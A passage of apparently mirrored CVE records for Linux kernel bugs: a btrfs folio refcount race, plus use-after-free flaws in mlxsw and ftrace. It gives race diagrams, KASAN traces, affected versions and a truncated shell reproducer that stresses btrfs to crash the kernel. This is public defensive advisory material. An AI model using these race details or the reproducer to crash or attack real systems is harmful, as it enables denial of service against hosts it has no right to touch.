      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41048",
    "datePublished": "2024-07-29T14:32:05.224Z",
    "dateReserved": "2024-07-12T12:17:45.625Z",
    "dateUpdated": "2025-11-03T21:59:48.428Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38306 (GCVE-0-2024-38306)

Vulnerability from cvelistv5 – Published: 2024-06-25 14:22 – Updated: 2025-05-04 09:13

Title

btrfs: protect folio::private when attaching extent buffer folios

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: protect folio::private when attaching extent buffer folios [BUG] Since v6.8 there are rare kernel crashes reported by various people, the common factor is bad page status error messages like this: BUG: Bad page state in process kswapd0 pfn:d6e840 page: refcount:0 mapcount:0 mapping:000000007512f4f2 index:0x2796c2c7c pfn:0xd6e840 aops:btree_aops ino:1 flags: 0x17ffffe0000008(uptodate|node=0|zone=2|lastcpupid=0x3fffff) page_type: 0xffffffff() raw: 0017ffffe0000008 dead000000000100 dead000000000122 ffff88826d0be4c0 raw: 00000002796c2c7c 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: non-NULL mapping [CAUSE] Commit 09e6cef19c9f ("btrfs: refactor alloc_extent_buffer() to allocate-then-attach method") changes the sequence when allocating a new extent buffer. Previously we always called grab_extent_buffer() under mapping->i_private_lock, to ensure the safety on modification on folio::private (which is a pointer to extent buffer for regular sectorsize). This can lead to the following race: Thread A is trying to allocate an extent buffer at bytenr X, with 4 4K pages, meanwhile thread B is trying to release the page at X + 4K (the second page of the extent buffer at X). Thread A | Thread B -----------------------------------+------------------------------------- | btree_release_folio() | | This is for the page at X + 4K, | | Not page X. | | alloc_extent_buffer() | |- release_extent_buffer() |- filemap_add_folio() for the | | |- atomic_dec_and_test(eb->refs) | page at bytenr X (the first | | | | page). | | | | Which returned -EEXIST. | | | | | | | |- filemap_lock_folio() | | | | Returned the first page locked. | | | | | | | |- grab_extent_buffer() | | | | |- atomic_inc_not_zero() | | | | | Returned false | | | | |- folio_detach_private() | | |- folio_detach_private() for X | |- folio_test_private() | | |- folio_test_private() | Returned true | | | Returned true |- folio_put() | |- folio_put() Now there are two puts on the same folio at folio X, leading to refcount underflow of the folio X, and eventually causing the BUG_ON() on the page->mapping. The condition is not that easy to hit: - The release must be triggered for the middle page of an eb If the release is on the same first page of an eb, page lock would kick in and prevent the race. - folio_detach_private() has a very small race window It's only between folio_test_private() and folio_clear_private(). That's exactly when mapping->i_private_lock is used to prevent such race, and commit 09e6cef19c9f ("btrfs: refactor alloc_extent_buffer() to allocate-then-attach method") screwed that up. At that time, I thought the page lock would kick in as filemap_release_folio() also requires the page to be locked, but forgot the filemap_release_folio() only locks one page, not all pages of an extent buffer. [FIX] Move all the code requiring i_private_lock into attach_eb_folio_to_filemap(), so that everything is done with proper lock protection. Furthermore to prevent future problems, add an extra lockdep_assert_locked() to ensure we're holding the proper lock. To reproducer that is able to hit the race (takes a few minutes with instrumented code inserting delays to alloc_extent_buffer()): #!/bin/sh drop_caches () { while(true); do echo 3 > /proc/sys/vm/drop_caches echo 1 > /proc/sys/vm/compact_memory done } run_tar () { while(true); do for x in `seq 1 80` ; do tar cf /dev/zero /mnt > /dev/null & done wait done } mkfs.btrfs -f -d single -m single ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/952f048eb901881a7…
	https://git.kernel.org/stable/c/f3a5367c679d31473…

Impacted products

Vendor

Product

Version

Linux

Affected: 09e6cef19c9fc0e10547135476865b5272aa0406 , < 952f048eb901881a7cc6f7c1368b53cd386ead7b (git)
Affected: 09e6cef19c9fc0e10547135476865b5272aa0406 , < f3a5367c679d31473d3fbb391675055b4792c309 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:04:25.336Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/952f048eb901881a7cc6f7c1368b53cd386ead7b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f3a5367c679d31473d3fbb391675055b4792c309"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38306",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:08:21.055578Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:42.868Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/extent_io.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "952f048eb901881a7cc6f7c1368b53cd386ead7b",
              "status": "affected",
              "version": "09e6cef19c9fc0e10547135476865b5272aa0406",
              "versionType": "git"
            },
            {
              "lessThan": "f3a5367c679d31473d3fbb391675055b4792c309",
              "status": "affected",
              "version": "09e6cef19c9fc0e10547135476865b5272aa0406",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/extent_io.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: protect folio::private when attaching extent buffer folios\n\n[BUG]\nSince v6.8 there are rare kernel crashes reported by various people,\nthe common factor is bad page status error messages like this:\n\n  BUG: Bad page state in process kswapd0  pfn:d6e840\n  page: refcount:0 mapcount:0 mapping:000000007512f4f2 index:0x2796c2c7c\n  pfn:0xd6e840\n  aops:btree_aops ino:1\n  flags: 0x17ffffe0000008(uptodate|node=0|zone=2|lastcpupid=0x3fffff)\n  page_type: 0xffffffff()\n  raw: 0017ffffe0000008 dead000000000100 dead000000000122 ffff88826d0be4c0\n  raw: 00000002796c2c7c 0000000000000000 00000000ffffffff 0000000000000000\n  page dumped because: non-NULL mapping\n\n[CAUSE]\nCommit 09e6cef19c9f (\"btrfs: refactor alloc_extent_buffer() to\nallocate-then-attach method\") changes the sequence when allocating a new\nextent buffer.\n\nPreviously we always called grab_extent_buffer() under\nmapping-\u003ei_private_lock, to ensure the safety on modification on\nfolio::private (which is a pointer to extent buffer for regular\nsectorsize).\n\nThis can lead to the following race:\n\nThread A is trying to allocate an extent buffer at bytenr X, with 4\n4K pages, meanwhile thread B is trying to release the page at X + 4K\n(the second page of the extent buffer at X).\n\n           Thread A                |                 Thread B\n-----------------------------------+-------------------------------------\n                                   | btree_release_folio()\n\t\t\t\t   | | This is for the page at X + 4K,\n\t\t\t\t   | | Not page X.\n\t\t\t\t   | |\nalloc_extent_buffer()              | |- release_extent_buffer()\n|- filemap_add_folio() for the     | |  |- atomic_dec_and_test(eb-\u003erefs)\n|  page at bytenr X (the first     | |  |\n|  page).                          | |  |\n|  Which returned -EEXIST.         | |  |\n|                                  | |  |\n|- filemap_lock_folio()            | |  |\n|  Returned the first page locked. | |  |\n|                                  | |  |\n|- grab_extent_buffer()            | |  |\n|  |- atomic_inc_not_zero()        | |  |\n|  |  Returned false               | |  |\n|  |- folio_detach_private()       | |  |- folio_detach_private() for X\n|     |- folio_test_private()      | |     |- folio_test_private()\n      |  Returned true             | |     |  Returned true\n      |- folio_put()               |       |- folio_put()\n\nNow there are two puts on the same folio at folio X, leading to refcount\nunderflow of the folio X, and eventually causing the BUG_ON() on the\npage-\u003emapping.\n\nThe condition is not that easy to hit:\n\n- The release must be triggered for the middle page of an eb\n  If the release is on the same first page of an eb, page lock would kick\n  in and prevent the race.\n\n- folio_detach_private() has a very small race window\n  It\u0027s only between folio_test_private() and folio_clear_private().\n\nThat\u0027s exactly when mapping-\u003ei_private_lock is used to prevent such race,\nand commit 09e6cef19c9f (\"btrfs: refactor alloc_extent_buffer() to\nallocate-then-attach method\") screwed that up.\n\nAt that time, I thought the page lock would kick in as\nfilemap_release_folio() also requires the page to be locked, but forgot\nthe filemap_release_folio() only locks one page, not all pages of an\nextent buffer.\n\n[FIX]\nMove all the code requiring i_private_lock into\nattach_eb_folio_to_filemap(), so that everything is done with proper\nlock protection.\n\nFurthermore to prevent future problems, add an extra\nlockdep_assert_locked() to ensure we\u0027re holding the proper lock.\n\nTo reproducer that is able to hit the race (takes a few minutes with\ninstrumented code inserting delays to alloc_extent_buffer()):\n\n  #!/bin/sh\n  drop_caches () {\n\t  while(true); do\n\t\t  echo 3 \u003e /proc/sys/vm/drop_caches\n\t\t  echo 1 \u003e /proc/sys/vm/compact_memory\n\t  done\n  }\n\n  run_tar () {\n\t  while(true); do\n\t\t  for x in `seq 1 80` ; do\n\t\t\t  tar cf /dev/zero /mnt \u003e /dev/null \u0026\n\t\t  done\n\t\t  wait\n\t  done\n  }\n\n  mkfs.btrfs -f -d single -m single\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:13:23.654Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/952f048eb901881a7cc6f7c1368b53cd386ead7b"
        },
        {
          "url": "https://git.kernel.org/stable/c/f3a5367c679d31473d3fbb391675055b4792c309"
        }
      ],
      "title": "btrfs: protect folio::private when attaching extent buffer folios",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38306",
    "datePublished": "2024-06-25T14:22:36.903Z",
    "dateReserved": "2024-06-24T13:53:25.575Z",
    "dateUpdated": "2025-05-04T09:13:23.654Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35855 (GCVE-0-2024-35855)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:47 – Updated: 2025-05-04 09:06

Title

mlxsw: spectrum_acl_tcam: Fix possible use-after-free during activity update

Summary

In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix possible use-after-free during activity update The rule activity update delayed work periodically traverses the list of configured rules and queries their activity from the device. As part of this task it accesses the entry pointed by 'ventry->entry', but this entry can be changed concurrently by the rehash delayed work, leading to a use-after-free [1]. Fix by closing the race and perform the activity query under the 'vregion->lock' mutex. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140 Read of size 8 at addr ffff8881054ed808 by task kworker/0:18/181 CPU: 0 PID: 181 Comm: kworker/0:18 Not tainted 6.9.0-rc2-custom-00781-gd5ab772d32f7 #2 Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019 Workqueue: mlxsw_core mlxsw_sp_acl_rule_activity_update_work Call Trace: <TASK> dump_stack_lvl+0xc6/0x120 print_report+0xce/0x670 kasan_report+0xd7/0x110 mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140 mlxsw_sp_acl_rule_activity_update_work+0x219/0x400 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 1039: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x8f/0xa0 __kmalloc+0x19c/0x360 mlxsw_sp_acl_tcam_entry_create+0x7b/0x1f0 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x30d/0xb50 mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30 Freed by task 1039: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 poison_slab_object+0x102/0x170 __kasan_slab_free+0x14/0x30 kfree+0xc1/0x290 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3d7/0xb50 mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1b73f6e4ea770410a…
	https://git.kernel.org/stable/c/e24d2487424779c02…
	https://git.kernel.org/stable/c/c17976b42d546ee11…
	https://git.kernel.org/stable/c/b996e8699da810e4c…
	https://git.kernel.org/stable/c/feabdac2057e863d0…
	https://git.kernel.org/stable/c/b183b915beef818a2…
	https://git.kernel.org/stable/c/79b5b4b18bc85b19d…

Impacted products

Vendor

Product

Version

Linux

Affected: 2bffc5322fd8679e879cd6370881ee50cf141ada , < 1b73f6e4ea770410a937a8db98f77e52594d23a0 (git)
Affected: 2bffc5322fd8679e879cd6370881ee50cf141ada , < e24d2487424779c02760ff50cd9021b8676e19ef (git)
Affected: 2bffc5322fd8679e879cd6370881ee50cf141ada , < c17976b42d546ee118ca300db559630ee96fb758 (git)
Affected: 2bffc5322fd8679e879cd6370881ee50cf141ada , < b996e8699da810e4c915841d6aaef761007f933a (git)
Affected: 2bffc5322fd8679e879cd6370881ee50cf141ada , < feabdac2057e863d0e140a2adf3d232eb4882db4 (git)
Affected: 2bffc5322fd8679e879cd6370881ee50cf141ada , < b183b915beef818a25e3154d719ca015a1ae0770 (git)
Affected: 2bffc5322fd8679e879cd6370881ee50cf141ada , < 79b5b4b18bc85b19d3a518483f9abbbe6d7b3ba4 (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35855",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-17T16:58:00.643012Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:37.309Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.376Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1b73f6e4ea770410a937a8db98f77e52594d23a0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e24d2487424779c02760ff50cd9021b8676e19ef"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c17976b42d546ee118ca300db559630ee96fb758"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b996e8699da810e4c915841d6aaef761007f933a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/feabdac2057e863d0e140a2adf3d232eb4882db4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b183b915beef818a25e3154d719ca015a1ae0770"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/79b5b4b18bc85b19d3a518483f9abbbe6d7b3ba4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1b73f6e4ea770410a937a8db98f77e52594d23a0",
              "status": "affected",
              "version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
              "versionType": "git"
            },
            {
              "lessThan": "e24d2487424779c02760ff50cd9021b8676e19ef",
              "status": "affected",
              "version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
              "versionType": "git"
            },
            {
              "lessThan": "c17976b42d546ee118ca300db559630ee96fb758",
              "status": "affected",
              "version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
              "versionType": "git"
            },
            {
              "lessThan": "b996e8699da810e4c915841d6aaef761007f933a",
              "status": "affected",
              "version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
              "versionType": "git"
            },
            {
              "lessThan": "feabdac2057e863d0e140a2adf3d232eb4882db4",
              "status": "affected",
              "version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
              "versionType": "git"
            },
            {
              "lessThan": "b183b915beef818a25e3154d719ca015a1ae0770",
              "status": "affected",
              "version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
              "versionType": "git"
            },
            {
              "lessThan": "79b5b4b18bc85b19d3a518483f9abbbe6d7b3ba4",
              "status": "affected",
              "version": "2bffc5322fd8679e879cd6370881ee50cf141ada",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix possible use-after-free during activity update\n\nThe rule activity update delayed work periodically traverses the list of\nconfigured rules and queries their activity from the device.\n\nAs part of this task it accesses the entry pointed by \u0027ventry-\u003eentry\u0027,\nbut this entry can be changed concurrently by the rehash delayed work,\nleading to a use-after-free [1].\n\nFix by closing the race and perform the activity query under the\n\u0027vregion-\u003elock\u0027 mutex.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140\nRead of size 8 at addr ffff8881054ed808 by task kworker/0:18/181\n\nCPU: 0 PID: 181 Comm: kworker/0:18 Not tainted 6.9.0-rc2-custom-00781-gd5ab772d32f7 #2\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_rule_activity_update_work\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xc6/0x120\n print_report+0xce/0x670\n kasan_report+0xd7/0x110\n mlxsw_sp_acl_tcam_flower_rule_activity_get+0x121/0x140\n mlxsw_sp_acl_rule_activity_update_work+0x219/0x400\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 1039:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n __kmalloc+0x19c/0x360\n mlxsw_sp_acl_tcam_entry_create+0x7b/0x1f0\n mlxsw_sp_acl_tcam_vchunk_migrate_all+0x30d/0xb50\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 1039:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n kasan_save_free_info+0x3b/0x60\n poison_slab_object+0x102/0x170\n __kasan_slab_free+0x14/0x30\n kfree+0xc1/0x290\n mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3d7/0xb50\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:55.614Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1b73f6e4ea770410a937a8db98f77e52594d23a0"
        },
        {
          "url": "https://git.kernel.org/stable/c/e24d2487424779c02760ff50cd9021b8676e19ef"
        },
        {
          "url": "https://git.kernel.org/stable/c/c17976b42d546ee118ca300db559630ee96fb758"
        },
        {
          "url": "https://git.kernel.org/stable/c/b996e8699da810e4c915841d6aaef761007f933a"
        },
        {
          "url": "https://git.kernel.org/stable/c/feabdac2057e863d0e140a2adf3d232eb4882db4"
        },
        {
          "url": "https://git.kernel.org/stable/c/b183b915beef818a25e3154d719ca015a1ae0770"
        },
        {
          "url": "https://git.kernel.org/stable/c/79b5b4b18bc85b19d3a518483f9abbbe6d7b3ba4"
        }
      ],
      "title": "mlxsw: spectrum_acl_tcam: Fix possible use-after-free during activity update",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35855",
    "datePublished": "2024-05-17T14:47:31.436Z",
    "dateReserved": "2024-05-17T13:50:33.106Z",
    "dateUpdated": "2025-05-04T09:06:55.614Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38588 (GCVE-0-2024-38588)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:37 – Updated: 2025-11-03 20:38

Title

ftrace: Fix possible use-after-free issue in ftrace_location()

Summary

In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix possible use-after-free issue in ftrace_location() KASAN reports a bug: BUG: KASAN: use-after-free in ftrace_location+0x90/0x120 Read of size 8 at addr ffff888141d40010 by task insmod/424 CPU: 8 PID: 424 Comm: insmod Tainted: G W 6.9.0-rc2+ [...] Call Trace: <TASK> dump_stack_lvl+0x68/0xa0 print_report+0xcf/0x610 kasan_report+0xb5/0xe0 ftrace_location+0x90/0x120 register_kprobe+0x14b/0xa40 kprobe_init+0x2d/0xff0 [kprobe_example] do_one_initcall+0x8f/0x2d0 do_init_module+0x13a/0x3c0 load_module+0x3082/0x33d0 init_module_from_file+0xd2/0x130 __x64_sys_finit_module+0x306/0x440 do_syscall_64+0x68/0x140 entry_SYSCALL_64_after_hwframe+0x71/0x79 The root cause is that, in lookup_rec(), ftrace record of some address is being searched in ftrace pages of some module, but those ftrace pages at the same time is being freed in ftrace_release_mod() as the corresponding module is being deleted: CPU1 | CPU2 register_kprobes() { | delete_module() { check_kprobe_address_safe() { | arch_check_ftrace_location() { | ftrace_location() { | lookup_rec() // USE! | ftrace_release_mod() // Free! To fix this issue: 1. Hold rcu lock as accessing ftrace pages in ftrace_location_range(); 2. Use ftrace_location_range() instead of lookup_rec() in ftrace_location(); 3. Call synchronize_rcu() before freeing any ftrace pages both in ftrace_process_locs()/ftrace_release_mod()/ftrace_free_mem().

Severity ?

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/eea46baf145150910…
	https://git.kernel.org/stable/c/1880a324af1c95940…
	https://git.kernel.org/stable/c/8ea8ef5e42173560a…
	https://git.kernel.org/stable/c/dbff5f0bfb2416b8b…
	https://git.kernel.org/stable/c/7b4881da5b19f6570…
	https://git.kernel.org/stable/c/66df065b3106964e6…
	https://git.kernel.org/stable/c/31310e373f4c8c74e…
	https://git.kernel.org/stable/c/e60b613df8b6253de…

Impacted products

Vendor

Product

Version

Linux

Affected: ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b , < eea46baf145150910ba134f75a67106ba2222c1b (git)
Affected: ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b , < 1880a324af1c95940a7c954b6b937e86844a33bd (git)
Affected: ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b , < 8ea8ef5e42173560ac510e92a1cc797ffeea8831 (git)
Affected: ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b , < dbff5f0bfb2416b8b55c105ddbcd4f885e98fada (git)
Affected: ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b , < 7b4881da5b19f65709f5c18c1a4d8caa2e496461 (git)
Affected: ae6aa16fdc163afe6b04b6c073ad4ddd4663c03b , < 66df065b3106964e667b37bf8f7e55ec69d0c1f6 (git)
